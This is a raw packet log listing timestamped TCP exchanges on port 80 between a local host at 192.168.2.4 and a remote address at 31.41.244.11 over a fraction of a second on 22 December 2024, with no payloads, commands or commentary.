Dec 22, 2024 02:16:15.508032084 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.508073092 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.508090019 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.508119106 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.508133888 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.508819103 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.508836985 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.508866072 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.508886099 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.509150028 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.509206057 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.509592056 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.509638071 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.509663105 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.509680986 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.509706974 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.509721041 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.510581017 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.510597944 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.510616064 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.510632038 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.510646105 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.510656118 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.511353970 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.511404037 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.511526108 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.511543036 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.511574030 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.511590004 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.512233973 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.512279987 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.512346029 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.512363911 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.512398005 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.512398005 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.513185978 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.513235092 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.513339996 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.513386011 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.513485909 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.513529062 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.514017105 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.514060974 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.514149904 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.514167070 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.514197111 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.514197111 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.514877081 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.514923096 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.515096903 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.515114069 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.515141964 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.515157938 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.516215086 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.516258955 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.516360044 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.516376019 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.516400099 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.516415119 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.516669035 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.516712904 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.516805887 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.516824007 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.516856909 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.516856909 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.517581940 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.517627954 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.517752886 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.517770052 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.517798901 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.517815113 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.518511057 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.518557072 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.518661976 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.518678904 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.518707037 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.518759012 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.519368887 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.519418001 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.519499063 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.519515991 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.519547939 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.519547939 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.520356894 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.520374060 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.520390987 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.520404100 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.520420074 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.520430088 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.521114111 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.521156073 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.521246910 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.521264076 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.521290064 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.521305084 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.521974087 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.522017956 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.522103071 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.522120953 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.522151947 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.522151947 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.522916079 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.522963047 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.523076057 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.523092985 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.523118019 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.523133039 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.523821115 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.523864031 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.523973942 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.523993015 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.524023056 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.524023056 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.524647951 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.524692059 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.524766922 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.524785042 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.524813890 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.524837971 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.525648117 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.525692940 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.525698900 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.525716066 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.525743008 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.525751114 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.526437998 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.526479959 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.526592016 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.526608944 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.526634932 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.526649952 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.527343035 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.527390957 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.527431011 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.527447939 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.527473927 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.527488947 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.528295994 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.528338909 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.528569937 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.528609991 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.528651953 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.528669119 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.528693914 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.528708935 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.529464006 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.529508114 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.529597998 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.529614925 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.529642105 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.529658079 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.530271053 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.530320883 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.530422926 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.530441999 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.530463934 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.530484915 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.531155109 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.531203985 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.531286001 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.531306982 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.531332016 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.531347990 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.532075882 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.532126904 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.532166958 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.532185078 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.532215118 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.532229900 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.532951117 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.532998085 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.533086061 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.533102989 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.533134937 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.533186913 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.533821106 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.533865929 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.533941984 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.533957958 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.533986092 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.534009933 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.534821987 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.534840107 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.534856081 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.534872055 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.534888029 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.534894943 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.535619974 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.535662889 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.535738945 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.535783052 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.541277885 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.541301966 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.541321039 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.541330099 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.541343927 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.541351080 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.541780949 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.541831970 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.541856050 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.541873932 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.541898012 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.541908026 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.542452097 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.542496920 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.699331045 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.699378014 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.699390888 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.699394941 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.699414968 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.699419975 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.699436903 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.699450970 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.699718952 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.699737072 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.699767113 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.699790955 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.700278044 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.700326920 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.700357914 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.700401068 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.700741053 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.700767994 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.700783968 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.700794935 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.700809002 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.700819016 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.701540947 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.701608896 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.701653957 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.701670885 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.701697111 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.701711893 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.702467918 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.702516079 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.702526093 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.702542067 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.702569962 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.702585936 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.703331947 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.703432083 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.703434944 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.703452110 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.703478098 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.703500032 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.704216957 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.704257011 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.704308033 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.704324961 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.704346895 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.704365969 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.705105066 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.705153942 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.705207109 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.705223083 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.705250978 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.705266953 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.705971003 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.706017017 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.706099987 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.706115007 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.706144094 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.706157923 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.706857920 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.706904888 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.706958055 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.706974030 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.707004070 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.707019091 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.707745075 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.707794905 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.708009005 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.708025932 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.708054066 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.708069086 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.708630085 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.708676100 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.708791018 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.708806992 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.708833933 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.708848953 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.709544897 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.709595919 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.709647894 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.709665060 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.709697008 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.709713936 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.710419893 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.710467100 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.710519075 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.710535049 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.710567951 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.710582972 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.711303949 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.711405039 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.711419106 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.711435080 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.711464882 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.711481094 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.712176085 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.712225914 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.712256908 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.712274075 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.712304115 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.712317944 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.713074923 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.713118076 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.713171959 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.713188887 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.713219881 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.713268042 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.714001894 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.714046955 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.714098930 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.714114904 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.714140892 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.714157104 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.714907885 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.714956999 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.715025902 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.715043068 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.715070009 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.715085030 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.715754986 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.715801954 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.715853930 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.715869904 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.715894938 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.715909958 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.716634989 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.716690063 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.716743946 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.716761112 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.716789961 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.716804981 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.717562914 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.717608929 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.717713118 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.717730045 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.717766047 CET	49765	80	192.168.2.4	31.41.244.11
